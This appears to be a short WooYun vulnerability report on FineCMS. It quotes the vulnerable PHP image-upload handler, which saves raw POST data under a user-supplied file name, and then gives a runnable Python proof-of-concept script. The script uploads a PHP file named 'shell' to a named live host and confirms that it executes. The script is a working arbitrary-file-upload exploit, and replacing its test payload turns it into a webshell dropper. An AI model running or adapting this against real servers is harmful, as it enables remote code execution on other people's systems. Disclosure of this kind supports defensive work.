WooYun.org

$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
$destination = $default_path . basename( $_GET[ 'name' ] ); 
echo 'Saving your image to: '. $destination;
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'
import urllib2
import random
fileName = "shell" + str(random.randrange(1000,9999)) + ".php"
target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php"
def uploadShell():
    url = target + "?name=" + fileName
    req = urllib2.Request(url, headers={"Content-Type": "application/oct"}) 
    res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
    return res.read()
def poc():
    res = uploadShell()
    if res.find("tmp-upload-images") == -1:
        print "Failed !"
        return
    print "upload Shell success"
    url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
    md5 = urllib2.urlopen(url).read()
    if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:
        print "poc: " + url
poc()